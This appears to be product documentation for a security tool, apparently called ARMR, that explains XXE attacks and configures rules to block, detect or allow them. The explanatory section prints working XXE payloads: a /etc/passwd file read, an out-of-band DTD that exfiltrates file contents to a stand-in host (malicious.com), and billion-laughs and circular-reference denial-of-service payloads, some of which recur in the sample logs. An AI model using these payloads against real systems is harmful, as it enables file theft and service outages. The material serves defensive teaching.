XXE
Overview
An XML External Entity (XXE) attack can occur in any application that reads and processes XML. Although the attack is possible when reading local XML files, it is more common when the XML comes from a remote source, as is often the case with web applications. If an attacker knows that XML sent to an endpoint will be processed, the attacker can send an XML payload that makes the application perform server-side request forgery, read files from the local file system, or exhaust resources in a denial-of-service attack.
XXE attacks are made possible through the use of the Document Type Definition (DTD). A DTD defines the legal building blocks of an XML document by declaring elements and entities. Entities are commonly used to define constant values that can be referenced within the XML. A DTD can be declared inline within the document, or imported from an external .dtd file by using either a SYSTEM identifier (a URI, which may refer to a local file or to a remote server) or a PUBLIC identifier (a public name followed by a URI).
XML Components
student.xml
Notice the use of the medal1 general entity, which is referenced in the XML body as &medal1;. This is known as a general entity reference. There are also parameter entities, which are declared with a very similar syntax but can be referenced only within the DTD, using the %entity; syntax rather than the &entity; syntax.
In the example shown here, the DTD is embedded within the XML document itself. The DTD defines all of the legal building blocks of the XML, and the XML body conforms to it. It is also possible to move the DTD to an external source, either a local file or a file on a remote server, and update the XML to point to that source.
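To make general entity expansion concrete, the following Python sketch parses a small document with an embedded DTD using the standard library's xml.etree.ElementTree. The student record (id, name, GPA) is invented for illustration and is an assumption, not the original student.xml listing; only the element names and the medal1 entity are taken from the DTD described in this section.

```python
import xml.etree.ElementTree as ET

# Hypothetical document: the student values are made up for illustration.
# The DTD sits inside the DOCTYPE declaration (the internal subset).
STUDENT_XML = """<!DOCTYPE students [
<!ELEMENT students (student*)>
<!ELEMENT student (id, firstname, lastname, gpa)>
<!ELEMENT id (#PCDATA)>
<!ELEMENT firstname (#PCDATA)>
<!ELEMENT lastname (#PCDATA)>
<!ELEMENT gpa (#PCDATA)>
<!ENTITY medal1 "🥇">
]>
<students>
  <student>
    <id>1</id>
    <firstname>Ada</firstname>
    <lastname>Lovelace</lastname>
    <gpa>4.0 &medal1;</gpa>
  </student>
</students>"""


def read_gpa(xml_text: str) -> str:
    """Parse the document and return the text of the first <gpa> element."""
    root = ET.fromstring(xml_text)
    return root.find("student/gpa").text


if __name__ == "__main__":
    # The parser substitutes the declared value of medal1 for &medal1;.
    print(read_gpa(STUDENT_XML))
```

The parser performs the substitution before the application sees the text, which is why entity handling matters for security: the application never gets a chance to inspect the reference itself.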
students.dtd
<!ELEMENT students (student*)>
<!ELEMENT student (id, firstname, lastname, gpa)>
<!ELEMENT id (#PCDATA)>
<!ELEMENT firstname (#PCDATA)>
<!ELEMENT lastname (#PCDATA)>
<!ELEMENT gpa (#PCDATA)>
<!ENTITY medal1 "🥇">
Local File - SYSTEM
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE students SYSTEM "students.dtd">
<students>
...
</students>
Remote Server - PUBLIC
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE students PUBLIC "-//Campus//DTD Students//EN" "http://campus.com/dtds/students.dtd">
<students>
...
</students>
XXE Attacks
An XXE attack requires the attacker to supply a Document Type Definition (DTD); without one, an attack of this nature is not possible. A common scenario is a web application that receives HTTP POST requests with XML in the body. Such an application generally does not require the posted XML to include a DTD in the prolog, or even an XML declaration. An attacker can nevertheless intercept an HTTP request and change its body to include these components. When the application processes the amended XML, the XML parser/processor handles the attacker's DTD and performs the requested actions, such as resolving external entities or expanding entity references.
Local File Inclusion Example
HTTP POST Request
<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>
In this classic example, the attacker uses a general external ENTITY declaration named xxe, with the SYSTEM keyword and the file:// scheme, to gain access to a local file on the server. In this case, the file being accessed is /etc/passwd. When the entity reference &xxe; in the XML body is processed, the reference is expanded with the contents of the file. Depending on the application's logic, the HTTP response returned to the attacker may include those contents. The file has nothing to do with an entity definition, or with DTDs in general, but the parser will still try to read it as requested.
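As a rough illustration of how such a declaration can be spotted before anything is resolved, the sketch below uses Python's standard xml.parsers.expat module to list the external entities declared in the payload above. The function name external_entities is hypothetical, and this is only one way to inspect a document, not a description of how any particular product does it. Because no ExternalEntityRefHandler is installed, expat records the declaration but never opens the file.

```python
import xml.parsers.expat

# The payload from the example above.
PAYLOAD = """<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>"""


def external_entities(xml_text: str) -> list[tuple[str, str]]:
    """Return (entity name, system identifier) for each external entity declared."""
    found: list[tuple[str, str]] = []

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation):
        # Internal entities carry a value; external ones carry a system identifier.
        if system_id is not None:
            found.append((name, system_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return found


if __name__ == "__main__":
    for name, system_id in external_entities(PAYLOAD):
        print(f"external entity {name!r} points at {system_id}")
```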
Server Side Request Forgery Example
HTTP POST Request
<?xml version="1.0" ?>
<!DOCTYPE hack [
<!ENTITY % xxe SYSTEM 'http://malicious.com/dtds/xxe.dtd'>
%xxe;
%bravo;
]>
<hack>&charlie;</hack>
xxe.dtd
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % bravo "<!ENTITY charlie SYSTEM 'http://malicious.com/xxe/get?d=%data;'>">
In this example, the attacker hosts and controls the remote xxe.dtd file, located at http://malicious.com/dtds/xxe.dtd. The attacker also controls an endpoint where data can be received, located at http://malicious.com/xxe/get, which takes a URL parameter d that will carry the victim's data.
When the attacker sends the malicious XML to the victim's server, the XML parser/processor first downloads the malicious xxe.dtd file, which contains the parameter ENTITY declarations data and bravo. The replacement text of bravo is itself a declaration of a general external ENTITY called charlie, whose URL points back to the attacker's server. Notice that the URL parameter d is assigned the parameter entity reference %data;, which refers to the /etc/passwd file.
Returning to the XML that was posted to the victim's server, the DTD references %xxe; and %bravo;, which pulls the declarations from xxe.dtd into the DTD, including the general entity named charlie. Unlike parameter entities, general entities can be referenced in the XML body. Once the &charlie; reference is processed, the chain of events completes: the file /etc/passwd is read, and an HTTP request carrying the contents of the file is made to the attacker's server.
Denial of Service Example
HTTP POST Request
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
In this example, the attacker doesn’t use any external components. Instead, the idea is to make the application struggle and crash by overwhelming it with general entity references. The very first entity, lol, is assigned the value "lol". The subsequent entities are chained, with each entity referencing the previous entity ten times.
When the entity reference &lol9; is processed in the XML body, the chain causes the original lol entity to be referenced 10^9 (one billion) times. The original value of "lol", which is three characters in length, therefore expands to a string of three billion characters. This is famously known as the billion laughs attack.
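The arithmetic can be checked without performing the expansion. The Python sketch below rebuilds the ten entity definitions from the payload and computes the length of the fully expanded text by summing the lengths of the pieces; the function name expanded_length is illustrative.

```python
import re


def expanded_length(entities: dict[str, str], name: str) -> int:
    """Length of an entity's fully expanded text, computed without expanding it."""
    cache: dict[str, int] = {}

    def length_of(entity: str) -> int:
        if entity not in cache:
            total = 0
            # Split the definition into literal text and &name; references.
            for part in re.split(r"(&\w+;)", entities[entity]):
                reference = re.fullmatch(r"&(\w+);", part)
                if reference:
                    total += length_of(reference.group(1))
                else:
                    total += len(part)
            cache[entity] = total
        return cache[entity]

    return length_of(name)


# Rebuild the definitions from the payload: lol, then lol1 through lol9,
# each one referencing the previous entity ten times.
ENTITIES = {"lol": "lol"}
previous = "lol"
for level in range(1, 10):
    current = f"lol{level}"
    ENTITIES[current] = f"&{previous};" * 10
    previous = current

if __name__ == "__main__":
    print(expanded_length(ENTITIES, "lol9"))
```

A payload of well under a kilobyte therefore asks the parser to build a string of 3 × 10^9 characters.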
XXE Protection
Although many XML parsers offer configuration that protects against XXE attacks, this protection is generally not active by default. Older systems, including older versions of Java, have faulty XML parser/processor implementations that may not honour the security configuration even when it is provided.
The XXE security feature addresses attacks, regardless of Java version or XML parser, by enforcing a strict policy of what the XML can contain. There are two main parameters that can be configured in the XXE security feature. All configuration is optional, and is only required if it is necessary to relax the rule for certain scenarios.
Given (Condition)
There are no specific conditions under which XXE protection is configured.
When (Event)
Keyword | Description |
---|---|
xxe | The xxe keyword is one of two keywords that the marshal rule accepts; a single rule must be configured with exactly one of them. uri and reference are the only parameters accepted. |
Parameter | Description |
---|---|
uri | Only available in allow mode. An array of the SYSTEM or PUBLIC URIs/URLs, declared within the DTD, that are to be allowed. |
reference | Only available in protect mode. Defines two optional limits: limit, the number of general entity references allowed before the ARMR marshal rule triggers, and expansion-limit, the expanded string length allowed before the protection triggers. The default value for any omitted limit is 0. It is valid to specify a non-default value for one or both of these limits, for example: xxe(reference: {limit: 5, expansion-limit: 50}), xxe(reference: {limit: 8}), or xxe(reference: {expansion-limit: 70}). |
Then (Action)
Action | Description |
---|---|
protect | When the rule triggers, the application is prevented from parsing / processing the XML, therefore obviating the XXE attack vector. If configured, a log message is generated with details of the event. |
detect | Monitoring mode: the application behaves as normal. A log message is generated with details of the event. A log message must be specified with this action. |
allow | An attempt that would otherwise be considered as an attack has been allowed, and the application will continue as normal. If configured, a log message is generated with details of the event. With this action, the uri parameter must be used to define a list of allowed URIs/URLs. |
As part of the action statement, the user may optionally specify the parameter stacktrace: "full". When this parameter is specified, the stack trace of the location of the attempted exploit is included in the security log entry.
Rule Configuration
Protect Example
app("XXE SECURITY POLICY"):
  requires(version: ARMR/2.7)
  marshal("XXE:PROTECT"):
    xxe()
    protect(message: "An XXE attack has been blocked", severity: high)
  endmarshal
endapp
The above protect example provides the simplest and most restrictive configuration of the rule. Notice that the optional reference parameter is not provided. This means that no entity references are allowed, and neither are any string expansions arising from entity references. The uri parameter is not available in the protect configuration: all URIs are blocked by default, and any URI that needs to be allowed must be configured in an allow rule.
app("XXE SECURITY POLICY"):
  requires(version: ARMR/2.7)
  marshal("XXE:PROTECT"):
    xxe(reference: {limit: 5, expansion-limit: 50})
    protect(message: "An XXE attack has been blocked", severity: high)
  endmarshal
endapp
In this protect example, the rule is relaxed slightly for cases where a handful of entity references are required. Notice that the reference parameter has been configured with a limit of 5 and a string expansion-limit of 50. Any XML that uses more than 5 entity references, or that would expand a reference to a string longer than 50 characters, will not be processed.
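The threshold semantics described above can be modelled in a few lines of Python. This is only a sketch of the stated behaviour (a value above its limit triggers the rule, and an omitted limit defaults to 0); ReferenceLimits and would_trigger are hypothetical names, not part of ARMR, and how the product actually counts references is not specified here.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ReferenceLimits:
    """Illustrative stand-in for the rule's reference parameter (not an ARMR API)."""
    limit: int = 0            # general entity references allowed
    expansion_limit: int = 0  # expanded string length allowed


def would_trigger(reference_count: int, expanded_length: int,
                  limits: ReferenceLimits = ReferenceLimits()) -> bool:
    """Return True when either measured value exceeds its configured limit."""
    return (reference_count > limits.limit
            or expanded_length > limits.expansion_limit)


if __name__ == "__main__":
    relaxed = ReferenceLimits(limit=5, expansion_limit=50)
    print(would_trigger(5, 50, relaxed))  # at both limits
    print(would_trigger(6, 50, relaxed))  # one reference over the limit
    print(would_trigger(1, 3))            # default limits of 0
```

Under this model, the default configuration rejects any document that uses even a single entity reference, which matches the most restrictive behaviour described for xxe().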
Detect Example
app("XXE SECURITY POLICY"):
  requires(version: ARMR/2.7)
  marshal("XXE:DETECT"):
    xxe()
    detect(message: "An XXE attack has been detected", severity: high)
  endmarshal
endapp
The detect action is a good way to see how an application responds to the XXE security feature before putting the rule into protect mode. Any alerts produced by the rule are reported in the security log file, but the application continues to run as normal. This gives application owners the ability to review and evaluate any potential issues so that the rule can be tuned to meet their needs. It is particularly useful for applications that read XML configuration during startup.
Allow Example
app("XXE SECURITY POLICY"):
  requires(version: ARMR/2.7)
  marshal("XXE:ALLOW"):
    xxe(uri: ["http://struts.apache.org/dtds/struts-2.3.dtd",
              "http://struts.apache.org/dtds/struts-2.5.dtd",
              "http://java.sun.com/dtd/web-jsptaglibrary_1_2.dtd",
              "http://java.sun.com/j2ee/dtds/web-jsptaglibrary_1_1.dtd"])
    allow(message: "An external DTD URI has been allowed")
  endmarshal
endapp
The allow action is used in conjunction with a second XXE rule configured with a protect action. A rule configured with the allow action lets application owners permit access to specific URIs defined in the XML. Temporarily changing the action of the protect rule to detect helps identify any URIs that may need to be allowed. Once identified, the uri parameter can be configured to allow only those specific URIs. Attempts to access URIs outside of the list will be blocked.
Logging
Protect Example
<10>1 2022-02-18T12:51:22.449Z fedora java 226858 - - CEF:0|ARMR:ARMR|ARMR|2.7|XXE :PROTECT|Execute Rule|High|internalHttpRequestUri=/customer/add reason=The XML is using an external source: SYSTEM file:///etc/passwd procid=226858 dvchost=fedora localIpAddress=127.0.0.1 payload=<!-- <msg>hi</msg> -->\n\n<!DOCTYPE test\n [\n <!ELEMENT xxe ANY>\n <!ENTITY xxe SYSTEM "file:///etc/passwd">\n ]\n>\n<forum>\n <username>2.2.4.RELEASE</username>\n <message>&xxe;</message>\n</forum> httpRequestUri=/oval/api/vuln/xml httpRequestMethod=GET msg=An XXE attack has been blocked! ruleType=marshal appVersion=1 securityFeature=marshal external xml entity protection remoteIpAddress=127.0.0.1 rt=Feb 18 2022 12:51:22.449 +0000 act=protect
This log message shows that an attempt to access the external SYSTEM URI file:///etc/passwd has been blocked.
<10>1 2022-02-18T12:52:56.167Z fedora java 226858 - - CEF:0|ARMR:ARMR|ARMR|2.7|XXE :PROTECT|Execute Rule|High|internalHttpRequestUri=/customer/add reason=The XML entity 'lol1' is referenced: 10 time(s) in the XML DTD. The rule is configured with a reference limit of: 5 procid=226858 dvchost=fedora localIpAddress=127.0.0.1 payload=<?xml version\="1.0"?>\n<!DOCTYPE lolz\n [\n <!ELEMENT lolz (#PCDATA)>\n <!ENTITY lol "lol">\n <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">\n <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">\n <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">\n <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">\n <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">\n <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">\n <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">\n <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">\n <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">\n ]\n>\n<lolz>&lol9;</lolz> httpRequestUri=/oval/api/vuln/xml httpRequestMethod=GET msg=An XXE attack has been blocked! ruleType=marshal appVersion=1 securityFeature=marshal external xml entity protection remoteIpAddress=127.0.0.1 rt=Feb 18 2022 12:52:56.166 +0000 act=protect
This log message shows that there are too many entity references, surpassing the configured limit of 5.
<10>1 2022-02-18T12:54:13.931Z fedora java 226858 - - CEF:0|ARMR:ARMR|ARMR|2.7|XXE :PROTECT|Execute Rule|High|internalHttpRequestUri=/customer/add reason=The XML has a circular reference: 'aaa' procid=226858 dvchost=fedora localIpAddress=127.0.0.1 payload=<?xml version\="1.0"?>\n<!DOCTYPE lolz [\n <!ELEMENT lolz (#PCDATA)>\n <!ENTITY aaa "&ccc;">\n <!ENTITY bbb "&aaa;">\n <!ENTITY ccc "&bbb;">\n ]>\n<lolz>&aaa;</lolz> httpRequestUri=/oval/api/vuln/xml httpRequestMethod=GET msg=An XXE attack has been blocked! ruleType=marshal appVersion=1 securityFeature=marshal external xml entity protection remoteIpAddress=127.0.0.1 rt=Feb 18 2022 12:54:13.931 +0000 act=protect
This log message shows that circular entity references have been disallowed.
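A circular reference of this kind can be found with a depth-first walk over the entity definitions. The Python sketch below is a generic cycle check applied to the three entities from the logged payload; it is an illustration of the idea, not the product's implementation, and find_circular_reference is a hypothetical name.

```python
import re
from typing import Optional


def find_circular_reference(entities: dict[str, str]) -> Optional[str]:
    """Return the name of an entity that takes part in a reference cycle, or None."""
    visiting: set[str] = set()  # entities on the current walk
    done: set[str] = set()      # entities already shown to be cycle-free

    def visit(name: str) -> Optional[str]:
        if name in done:
            return None
        if name in visiting:
            return name  # reached an entity that is still being expanded
        visiting.add(name)
        # Follow every &name; reference in this entity's definition.
        for referenced in re.findall(r"&(\w+);", entities.get(name, "")):
            hit = visit(referenced)
            if hit is not None:
                return hit
        visiting.discard(name)
        done.add(name)
        return None

    for name in entities:
        hit = visit(name)
        if hit is not None:
            return hit
    return None


# Entity definitions taken from the payload in the log message above.
CIRCULAR = {"aaa": "&ccc;", "bbb": "&aaa;", "ccc": "&bbb;"}

if __name__ == "__main__":
    print(find_circular_reference(CIRCULAR))
```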
Detect Example
<10>1 2022-02-18T13:23:18.741Z localhost java 4414 - - CEF:0|ARMR:ARMR|ARMR|2.7|XXE:DETECT|Execute Rule|High|msg=A potential XXE attack has been detected! Please review. reason=The XML is using an external source: PUBLIC http://www.bea.com/servers/wls810/dtd/weblogic810-ra.dtd rt=Feb 18 2022 13:23:18.741 +0000 appVersion=1 act=detect payload=<?xml version\="1.0"?>\n\n<!DOCTYPE weblogic-connection-factory-dd PUBLIC '-//BEA Systems, Inc.//DTD WebLogic 9.0.0 Connector//EN' 'http://www.bea.com/servers/wls810/dtd/weblogic810-ra.dtd'>\n\n<weblogic-connection-factory-dd>\n\n <connection-factory-name>WLSJMSInternalConnectionFactoryNoTX</connection-factory-name>\n <jndi-name>eis/jms/internal/WLSConnectionFactoryJNDINoTX</jndi-name>\n <pool-params>\n <initial-capacity>0</initial-capacity>\n <max-capacity>100</max-capacity>\n </pool-params>\n <use-connection-proxies>false</use-connection-proxies>\n\n</weblogic-connection-factory-dd> dvchost=localhost ruleType=marshal procid=4414 securityFeature=marshal external xml entity protection
This log message shows that the external PUBLIC URI http://www.bea.com/servers/wls810/dtd/weblogic810-ra.dtd is declared within the XML being processed. Reviewing this information, we can determine whether that external DTD file is safe to access. In this case, the WebLogic application server appears to depend on this DTD file, so allowing it may be necessary. It is of course possible to review the contents of the DTD file at the stated URL to assess the level of risk it poses.
<10>1 2022-02-18T13:21:27.681Z localhost java 4197 - - CEF:0|ARMR:ARMR|ARMR|2.7|XXE:DETECT|Execute Rule|High|msg=A potential XXE attack has been detected! Please review. reason=The XML body is using entity references '1 time(s). The rule is configured with a reference limit of: 0 rt=Feb 18 2022 13:21:27.681 +0000 appVersion=1 act=detect payload=<?xml version\="1.0" encoding\="UTF-8"?>\n<Policy xmlns\="urn:oasis:names:tc:xacml:2.0:policy:schema:os" PolicyId\="urn:bea:xacml:2.0:entitlement:resource:type@E@Furl@G@M@Oapplication@Ewls-management-services@M@OcontextPath@E@Umanagement@M@Ouri@E@Uweblogic@U@K@M@OhttpMethod@EOPTIONS" RuleCombiningAlgId\="urn:oasis:names:tc:xacml:1.0:rule-combining-algorithm:first-applicable"><Description>?weblogic.entitlement.rules.UncheckedPolicy()</Description><Target><Resources><Resource><ResourceMatch MatchId\="urn:oasis:names:tc:xacml:1.0:function:string-equal"><AttributeValue DataType\="http://www.w3.org/2001/XMLSchema#string">type\=<url>, application\=wls-management-services, contextPath\=/management, uri\=/weblogic/*, httpMethod\=OPTIONS</AttributeValue><ResourceAttributeDesignator AttributeId\="urn:oasis:names:tc:xacml:2.0:resource:resource-ancestor-or-self" DataType\="http://www.w3.org/2001/XMLSchema#string" MustBePresent\="true"/></ResourceMatch></Resource></Resources></Target><Rule RuleId\="unchecked-policy" Effect\="Permit"></Rule></Policy> dvchost=localhost ruleType=marshal procid=4197 securityFeature=marshal external xml entity protection
This log message shows that the XML being processed contains one entity reference. Reviewing the contents of the XML will help determine whether, in this scenario, the use of a single entity reference poses any risk. As mentioned in the section on Denial of Service, general entity references can become dangerous when many are chained together.
Allow Example
<13>1 2022-02-18T13:44:50.051Z localhost java 5308 - - CEF:0|ARMR:ARMR|ARMR|2.7|XXE:ALLOW|Execute Rule|Unknown|msg=An external URI has been allowed. reason=The XML is using an external source: PUBLIC http://www.bea.com/servers/wls810/dtd/weblogic810-ra.dtd rt=Feb 18 2022 13:44:50.051 +0000 appVersion=1 act=allow payload=<?xml version\="1.0"?>\n\n<!DOCTYPE weblogic-connection-factory-dd PUBLIC '-//BEA Systems, Inc.//DTD WebLogic 9.0.0 Connector//EN' 'http://www.bea.com/servers/wls810/dtd/weblogic810-ra.dtd'>\n\n<weblogic-connection-factory-dd>\n\n <connection-factory-name>WLSJMSInternalConnectionFactoryNoTX</connection-factory-name>\n <jndi-name>eis/jms/internal/WLSConnectionFactoryJNDINoTX</jndi-name>\n <pool-params>\n <initial-capacity>0</initial-capacity>\n <max-capacity>100</max-capacity>\n </pool-params>\n <use-connection-proxies>false</use-connection-proxies>\n\n</weblogic-connection-factory-dd> dvchost=localhost ruleType=marshal procid=5308 securityFeature=marshal external xml entity protection
This log message shows the result of an XXE rule configured with an allow action and a message parameter. A security log entry is generated for the URI that has been allowed, which in this case is the external PUBLIC URI http://www.bea.com/servers/wls810/dtd/weblogic810-ra.dtd.
Logging On/Off Example
app("XXE SECURITY POLICY"):
  requires(version: ARMR/2.7)
  marshal("XXE:PROTECT"):
    xxe()
    protect(message: "", severity: high)
  endmarshal
  marshal("XXE:ALLOW"):
    xxe(uri: ["http://struts.apache.org/dtds/struts-2.3.dtd"])
    allow(severity: low)
  endmarshal
endapp
In the above example, logging is switched ON in the protect rule by the inclusion of the message attribute in the protect action. As the message attribute is defined as an empty string (""), a default message is included in the msg extension of the security event. Logging is switched OFF in the allow rule by the omission of the message attribute from the allow action.